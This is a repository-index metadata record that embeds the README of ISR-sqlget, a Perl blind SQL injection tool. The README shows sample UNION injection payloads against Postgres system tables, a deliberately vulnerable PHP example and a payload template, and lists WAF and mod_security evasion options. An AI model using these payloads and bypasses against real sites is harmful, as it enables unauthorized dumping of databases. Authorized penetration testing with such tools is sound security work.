{"id":19236425,"url":"https://github.com/infobyte/isr-sqlget","last_synced_at":"2025-04-21T05:32:23.580Z","repository":{"id":69537956,"uuid":"9700503","full_name":"infobyte/isr-sqlget","owner":"infobyte","description":"ISR-sqlget It's a blind SQL injection tool developed in Perl.","archived":false,"fork":false,"pushed_at":"2013-04-26T17:31:43.000Z","size":492,"stargazers_count":14,"open_issues_count":0,"forks_count":16,"subscribers_count":8,"default_branch":"master","last_synced_at":"2025-04-01T10:11:13.323Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Perl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/infobyte.png","metadata":{"files":{"readme":"README","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2013-04-26T17:24:28.000Z","updated_at":"2024-02-09T00:02:54.000Z","dependencies_parsed_at":"2023-02-21T04:45:36.586Z","dependency_job_id":null,"html_url":"https://github.com/infobyte/isr-sqlget","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fisr-sqlget/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/infobyte","download_url":"https://codeload.github.com/infobyte/isr-sqlget/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repo
sitories_count":250002291,"owners_count":21359086,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-09T16:20:34.173Z","updated_at":"2025-04-21T05:32:23.258Z","avatar_url":"https://github.com/infobyte.png","language":"Perl","funding_links":[],"categories":[],"sub_categories":[],"readme":"-- ISR - Infobyte Security Research\n-- | ISR-sqlget | www.infobytesec.com |\n\n\n..:: DESCRIPTION\n\nISR-sqlget: It's a blind SQL injection tool developed in Perl.\nIt lets you get databases schemas and tables rows.\nUsing a single GET/POST you can access quietly the database structure \nand using a single GET/POST you can dump every table row to a csv-like file.\n\nDatabases supported:\n\n    - IBM DB2\n    - Microsoft SQL Server\n    - Oracle\n    - Postgres\n    - Mysql\n    - IBM Informix\n    - Sybase\n    - Hsqldb (www.hsqldb.org)\n    - Mimer (www.mimer.com)\n    - Pervasive (www.pervasive.com)\n    - Virtuoso (virtuoso.openlinksw.com)\n    - SQLite\n    - Interbase/Yaffil/Firebird (Borland)\n    - H2 (http://www.h2database.com)\n    - Mckoi (http://mckoi.com/database/)\n    - Ingres (http://www.ingres.com)\n    - MonetDB (http://www.monetdb.nl)\n    - MaxDB (www.mysql.com/products/maxdb/)\n    - ThinkSQL (http://www.thinksql.co.uk/)    \n    - SQLBase (http://www.unify.com)\n\nEvasion features:\n\n    - Full-width/Half-width Unicode encoding\n    - Apache non standard CR bypass\n    - mod_security bypass\n    - Random uppercase request transform\n    - PHP Magicquotes: encode every string using db CHR function or similar.\n    - Convert requests to hexadecimal 
values\n    - Avoid non-space replacing for /**/ or (\\t) tab \n    - Avoid non || or + concatenation using db concat function or similar.\n    - Random user-agent\n    - Random proxy-server\n    - Random delay request\n\nCommon features:\n\n    - Database schema download blacklist\n    - Cookie array support\n    - SSL support\n    - Proxy server support\n    - Database information dumped in csv format\n\nReporting:\n\n    - Database structure graphing to create impact executive reports\n    (requires the Graphviz library, http://www.graphviz.org/)\n\n..:: USE\n\nThe tool needs the following information:\n- \u003cACTION\u003e  : Action to do?\n- \u003cSESSION\u003e : Where?\n\nThe possible ACTIONs are:\n\n    First:\n\t1. Get the database schema.\n\n    Then:\n\t2.a Get the table rows (csv format).\n\t2.b Get graphic database schema.\n\n..::Example: \n\nTarget:\nhttp://target.infobytesec.com/helloworld.php?id=\u003cSQL-INJECT\u003e\n\nhelloworld.php source:\n\u003c?\n$id = $_REQUEST['id'];\n\n$sql= 'select name from clients where id='.$id;\nexec_sql($sql);\n\n print \"Results\";\n print \"\u003ctable\u003e\";\n while ($tr = $database-\u003efetch_row()) {\n    print \"\u003ctr\u003e\u003ctd\u003e\";\n    print $tr['name'];\n    print \"\u003c/td\u003e\u003c/tr\u003e\";\n }\n print \"\u003c/table\u003e\";\n?\u003e\n\nRead the session example (config file):\n./helloworld.pm\n\nGet the database schema:\n\n; bash# ./ISR-sqlget.pl -s -n helloworld\n; --------------------------------------------------\n; Action: Get dbschema, Session name: helloworld\n; --------------------------------------------------\n; \n; http://target.infobytesec.com/helloworld.php?id=,id=1  union select 1,COALESCE((select nspname from pg_namespace \n; where a.relnamespace =pg_namespace.oid),'0'::text)||'[__]'||COALESCE(relname,'0'::text)||'[__]'||COALESCE(attname,'0'::text);\n; ||'[__]'||COALESCE((select typname from pg_type where oid=b.atttypid),'0'::text) from (pg_attribute b JOIN pg_class a ON 
\n; (a.oid = b.attrelid)) where (attnum \u003e 0 and ((a.relkind = 'r'::\"char\") OR (a.relkind = 's'::\"char\")))  --'\n; from sqlite_master where type='table'  --,GET\n; \n; bash#\n \nThis generates a local schema file in:\n./template/helloworld.dbschema\n\nThen get the table rows:\n\n; bash# ./ISR-sqlget.pl -d -n helloworld\n;--------------------------------------------------\n;Action: Get DBDATA, Session name: helloworld\n;--------------------------------------------------\n;--------------------------------------------------\n;Action: Get DBDATA, Session name: helloworld, DbSchema: helloworld.dbschema\n;--------------------------------------------------\n;------------------------------------------------------------------------------------------------------------------------------------------------------\n;http://target.infobyte.com.ar/helloworld.php?id=,id=1 union all select id||'[__]'||name||'[__]'||address from\n;company.clients   --,GET\n;Save source table: ./datos/helloworld.company.clients.sql.html\n;Save csv table: ./datos/helloworld.company.clients.csv\n;------------------------------------------------------------------------------------------------------------------------------\n;.....\n\nIn the directory \"./datos/\" you will have two files per table, as follows: \n\n[sessionname].[database].[table].sql.html  # html source\n[sessionname].[database].[table].csv \t   # comma separated values\n\nNote that \"./datos\" can be specified with the parameter $conf::outputdb in the session\nconfig file.\n\n..:: Advanced\n\nThe tool uses only one column of type text/varchar/etc. in the SELECT SQL query.\nUsing UNION sentences you can get \"in that column\" all the database schema using \"[__]\" as delimiter.\n\nWhen you have already saved the local database schema, you will be able to:\n\n1.a Get the table rows:\n    Using the same technique you can get all the rows of every table in the database,\n    columns with datatypes that are not compatible with text 
are transformed into datatype text\n    using the database's own functions.\n\n1.b Get database schema graphic.\n\nThe tool uses a session config file for each action.\nThis config file defines the necessary parameters to exploit the SQL injection.\nThe parameter @conf::path specifies the way that raw html is parsed to work with the tool.\n\nHelp details:\n\n Usage: ./ISR-sqlget.pl [ACTION] [OPTIONS]\n\nAction:\n    -c:  Check parser module\n    -t:  Get test page\n    -a:  Get all database names (only mssql)\n    -s:  Get database/s structure/s\n    -d:  Get database/s information/s (csv format)\n    -g:  Graphic structure of database (gif format)\n\t\t\t\n\t\t\t\nOptions:\n    -n:  Session name\n    -p: (Use with -c action, specify src page to check the module);\n\tDefault ./template/$SESSION.testpage\n    -v:  Verbose\n    -h:  Help\n\n\n-t: Using the session file you get a short data system table to be used\n    with the action \"-c\" to parse the raw html later.\n\n-c: By default uses ./template/[session-name].testpage. It is used to develop and test\n    the raw html parser.\n    You can choose another html file using the \"-p\" option.\n    \n-a: All DB engines use the following order to get the table rows:\n    1. \"-s\" get structure (It saves the database schema in a local file).\n    2. \"-d\" get tables data.\n    \n    Because of MSSQL system tables we have to add a previous step:\n    1. \"-a\" Get all database names of /schema/catalog (It saves the names in a local file).\n    2. \"-s\" get structure (It saves the database schema in a local file).\n    3. \"-d\" get tables data.\n\n-s: get structure (It saves the database schema in a local file).    
\n-d: get tables data.\n\n-g: Uses the local database schema file previously obtained to \n    get the database graphic schema (gif format)\n    \n-n: It specifies the name of the session config file.\n    \n..:: Notes\n\n./pmschanges.txt: We use a modified version of LWP, Net::HTTP that includes methods and CRLs specifications\n\t\t  This file explains the modifications.\n\t\t  \n./dbs/isr_*: Every database module has the @space variable that specifies the type of valid space.\n\t     Example:\n\t\tmy @space=(' ',\"\\t\",\"/**/\"); #all spaces\n\n..:: Session file options:\n\n@conf::path #The parameter @conf::path specifies the way that raw html is parsed to work with the tool.\n\t    #It uses embedded perl code with HTML::TreeBuilder to parse the raw html\n\t    #The first configuration is a tree array with the html tag names needed. \n\t    The last html tag name is processed with the perl code.\n\nSee examples in ./examples/\nexample[n].html\nsession[n].pm\n\n$conf::site \t#Site where the vulnerable app is\n\n$conf::script \t#Vulnerable script file\n\n$conf::method \t#Method 'POST', 'GET', 'HELLO', '\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n' (apache method bypass)\n\n$conf::inj \t#POST/GET parameters with the UNION sentences\n\t\t#It uses variables that will later be replaced with the dynamic information.\n\n    Variables:\n    \u003cVALUE\u003e = Column used to get all the information.\n    \u003cTABLE\u003e = Tables section.\n    \u003cWHERE\u003e = Where section.\n    \u003cTAIL\u003e  = The last part of the sql sentence.\n\n    Example: \"id=1') union select \u003cVALUE\u003e,'a' from \u003cTABLE\u003e \u003cWHERE\u003e \u003cTAIL\u003e --\";\n\n$conf::where \t#If you need to add some exception in the union table you have to use this\n\t\t#parameter because there are some database structure queries that have \"WHERE\" included\n\t\t\n$conf::tail  \t#The last part of the sql sentence.\n$conf::param  \t#Parameter style = Post style 1, Url style 0\n    Post style=\n    
;root@isr-slackware:~/dev# telnet localhost 80\n    ;Trying 127.0.0.1...\n    ;Connected to localhost.\n    ;Escape character is '^]'.\n    ;GET http://site/aaa.php HTTP/1.0\n    ;id=aaa\n\n    Url style:\n    ;root@isr-slackware:~/dev# telnet localhost 80\n    ;Trying 127.0.0.1...\n    ;Connected to localhost.\n    ;Escape character is '^]'.\n    ;GET http://site/aaa.php?id=aaa HTTP/1.0\n\n$conf::dbtype #Database backend\n\n    1 - Oracle\n    2 - Microsoft SQL Server\n    3 - Mysql    \n    4 - Postgres\n    5 - IBM DB2\n    6 - Interbase/Yaffil/Firebird (Borland)    \n    7 - Mimer (www.mimer.com)    \n    8 - Virtuoso (virtuoso.openlinksw.com)\n    9 - Pervasive (www.pervasive.com)    \n    10 - Hsqldb (www.hsqldb.org)    \n    11 - SQLite    \n    12 - IBM Informix\n    13 - Sybase\n    14 - H2 (http://www.h2database.com)\n    15 - Mckoi (http://mckoi.com/database/)\n    16 - Ingres (http://www.ingres.com)\n    17 - MonetDB (http://www.monetdb.nl)\n    18 - MaxDB (www.mysql.com/products/maxdb/)\n    19 - ThinkSQL (http://www.thinksql.co.uk/)    \n    20 - SQLBase (http://www.unify.com)\n\n$conf::session #Session name (You have to use the same name as the session config file without .pm extension)\n$conf::outputdb #The path of the dumped table rows\n\n######### proxy\n$conf::proxy_host #Proxy support example: 'http://user:pass@host:port/'; \n$conf::rproxy     #Random proxy 1 enable or 0 disable\n$conf::rproxyfile #Proxy random file (Use the same format as $conf::proxy_host)\n\n######### filters\n$conf::space     #Space avoid: 0 enable space or 1 replace space ' ' with tab '\\t' or \n\t\t #2 replace space ' ' with comment '/**/'\n\n\n$conf::apache_espace    #You can specify the CRs value in the HTTP/s request\n\n#Example:\n# Valid apache CRs (\\x0b, \\x0c, \\x0d,)\n# $conf::apache_espace=\"\\x0b,\\x0c\";  #init=\\x0b and end=\\x0c\n# Process GET/POST/XXX HTTP request as \"GET\\x0b/script.php\\x0cHTTP/1.0\"\n\n$conf::apache_espace_rnd=1;     #random combination 
of CRs 0x0b, 0x0c, 0x0d\n$conf::apache_espace_rmaxn=10;  #Max random number of characters\n#In this example, we randomize the CRs (0x0b, 0x0c, 0x0d) from 1 to 10:\n#Reference: http://www.osvdb.org/25837\n\n$conf::mod_security \t#1 enable bypass modsecurity \u003c= 2.1.0 \u0026 (=\u003ePHP 5.2.0||PERL||Python)\n#Reference: http://www.php-security.org/MOPB/BONUS-12-2007.html\n\n$conf::full_width \t#1 enable bypass full-width encoding\n$conf::ruseragent \t#1 enable use random user agent\n$conf::ruseragentfile \t#User agent file list\n$conf::uagent \t\t#Default user agent\n$conf::delay  \t\t#Delay between connections\n$conf::rdelay \t\t#1 enable random maximum delay between connections, use the $conf::delay as max value.\n$conf::magicquotes \t#1 enable avoid magicquotes (use CHR function or similar in each database)\n$conf::convertall_hex \t#1 transform every parameter value in hex format (%41,%61)\n$conf::rnd_uppercase \t#1 enable uppercase random transform.\n\n######## filters only mssql\n$conf::scape_plas \t\t#1 enable, Use CONCAT function in case the script can't receive '+' \n\t\t\t\t#(used as string concatenation)\n$conf::convertall_str \t\t#1 enable convert all columns to string (recommended)\n$conf::scape_output_less \t#1 enable In case the script can't send '|' use database function to be replaced\n\n######## filters only oracle/db2/virtuoso/h2/mckoi/ingres/monetdb/maxdb/thinksql\n$conf::scape_pipe #Use CONCAT function or similar in case the script can't receive '|' (used as string concatenation)\n\n###### deny hash retrieve\n$conf::deny_dbname #array that has the database names not to be processed (blacklist)\nExample value = {'WMSYS' =\u003e 1,\n\t         'SYS' =\u003e 1\n                };\n\n#Cookie\n$conf::cookie #1 enable cookie arraying\n@conf::cookies #array with the cookies to use\nExample value = ( {\n                    version=\u003eundef,\n                    key=\u003e'valu1',\n                    val=\u003e'password',\n                    
path=\u003e'',\n                    domain=\u003e'',\n                    port=\u003eundef,\n                    path_spec=\u003eundef,\n                    secure=\u003eundef,\n                    maxage=\u003eundef,\n                    discard=\u003eundef,\n                    rest=\u003eundef\n                    });\n\n#Graphic options (More see GraphViz perl module help)\n$conf::graphdir = './graph/'; #The destination directory of graphics files\n$conf::glayout = 'dot';\n$conf::grootcolor='crimson';\n$conf::gdbcolor='darkgreen';\n$conf::gtablecolor='olivedrab1';\n$conf::gcolumncolor='lightblue2';\n$conf::gcolumn=0; #0= don't graph column 1= graph columns\n\t\t\t\t\t\t\n..:: REQUIREMENTS\n\n1 - Perl Modules:\n    LWP::UserAgent\n    HTTP::Cookies;\n    Convert::EastAsianWidth\n    Data::Dump\n    GraphViz \n    \n\n\n2 - Libs\n    GraphViz project (http://www.graphviz.org/)\n\n..:: DOWNLOAD\n\nhttp://www.infobytesec.com/development.html\n\n..:: AUTHOR\nFrancisco Amato\nfamato+at+infobytesec+dot+com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fisr-sqlget","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finfobyte%2Fisr-sqlget","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fisr-sqlget/lists"}